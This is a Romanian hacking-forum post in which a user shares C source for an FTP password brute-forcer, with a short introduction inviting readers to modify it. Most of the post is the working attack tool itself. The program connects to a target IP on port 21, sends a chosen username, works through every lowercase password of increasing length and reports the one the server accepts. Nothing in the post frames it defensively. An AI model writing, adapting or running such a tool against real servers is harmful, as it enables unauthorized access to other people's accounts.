Jump to content
shinnok

ftp bruteforce

By shinnok, in Programe hacking

Recommended Posts

shinnok Newbie

shinnok

Posted
Posted

Aveti mai jos un ftp bruteforcer facut in graba in urma unei necesitati de moment si m-am gandit sa il impart cu voi...poate il gaseste cineva interesant.Raza de caractere pentru parolele incercate este a-z iar lungimea este de 256 deci putem sa spunem ca ruleaza la infinit :D .Daca stiti putina programare il puteti modifica sa faca ce vreti voi(sai schimbati char. range,lungime,dictionar..etc) :P.


/*code by Shinnok*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <sys/stat.h>
#include <fcntl.h>


extern int errno;
int dc;


int main(int argc, char *argv[])
{
	struct sockaddr_in sdc;
	char msg[256];
	char resp[256];
	char pass[256];
	char byte;
	char bool;
	char count;
	char min = 'a';
	char max = 'z';
	int i,n;
	if(argc!=3) 
	{
		printf("Usage: %s ip user\n",argv[0]);
		exit(0);
	}
	n=1;
	pass[n-1]=min;
	pass[n]='\0';
	printf("Starting at length %d with charset [%c-%c].\n",n,min,max);
	while(1){
	if((dc = socket(AF_INET,SOCK_STREAM,0)) == -1) {
		perror("Error socket() dc");
		return errno;
	}
	bzero(&sdc,sizeof(sdc));
	sdc.sin_family=AF_INET;
	sdc.sin_port=htons((unsigned short int) 21);
	sdc.sin_addr.s_addr= inet_addr(argv[1]);
	if(connect(dc,(struct sockaddr *)&sdc,sizeof(struct sockaddr))==-1){
		perror("Cannot connect to server.\n");
		return errno;
	}
	bool=0;
	count=0;
	while(1){
	read(dc,&byte,1);
	if(byte == '\xD') bool=1;
	else
	if((byte == '\xA') && bool)  break;
	else
	if(count < 3) {
		resp[count] = byte;
		count++;
	}
	}
	sprintf(msg,"USER %s\xD\xA",argv[2]);
	write(dc,msg,strlen(msg));
	bool=0;
	count=0;
	while(1){
	read(dc,&byte,1);
	if(byte == '\xD') bool=1;
	else
	if((byte == '\xA') && bool)  break;
	else
	if(count < 3) {
		resp[count] = byte;
		count++;
	}
	}
	sprintf(msg,"PASS %s\xD\xA",pass);
	write(dc,msg,strlen(msg));
	bool=0;
	count=0;
	while(1){
	read(dc,&byte,1);
	if(byte == '\xD') bool=1;
	else
	if((byte == '\xA') && bool)  break;
	else
	if(count < 3) {
		resp[count] = byte;
		count++;
	}
	}
	resp[3]='\0';
	if(strcmp(resp,"230")==0) break;
	sprintf(msg,"QUIT\xD\xA");
	write(dc,msg,strlen(msg));
	shutdown(dc,SHUT_RDWR);
	close(dc);
	i=n-1;
	while(1){
	if(i==-1){
		pass[n]=min;
		n++;
		pass[n]='\0';
		printf("Now at length %d.\n",n);
		break;
	}else
	if(pass[i]==max){
	pass[i]=min;
	i--;
	continue;
	}else{
	pass[i]++;
	break;
	}
	}
	}
	printf("Password for %s is %s\n",argv[2],pass);
	return EXIT_SUCCESS;
}


EDIT:Apropo daca nu stiti ce nume sa ii dati cand il salvati punetii ftpbrute.c :D:)) lol (cica asta iar fi numele)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...